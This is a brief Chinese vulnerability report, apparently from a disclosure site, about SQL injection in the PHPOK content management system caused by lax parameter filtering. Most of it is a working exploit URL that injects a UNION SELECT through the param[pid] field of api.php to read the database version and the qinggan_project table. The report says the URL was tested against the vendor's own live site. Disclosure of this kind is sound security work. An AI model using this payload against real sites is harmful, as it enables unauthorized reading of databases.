### 简要描述:
参数过滤不严导致sql注入
### 详细说明:
测试官网OK
http://www.phpok.com/api.php?c=api&f=phpok&id=_sublist¶m[pid]=1%20union%20select%20VERSION(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33%20union%20select%20*%20from%20qinggan_project%20where%200
[<img src="https://images.seebug.org/upload/201406/06094936cd324bd49ad2fd4ccdc787b7e99d7c33.jpg" alt="phpok官网.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/06094936cd324bd49ad2fd4ccdc787b7e99d7c33.jpg)
### 漏洞证明:
暂无评论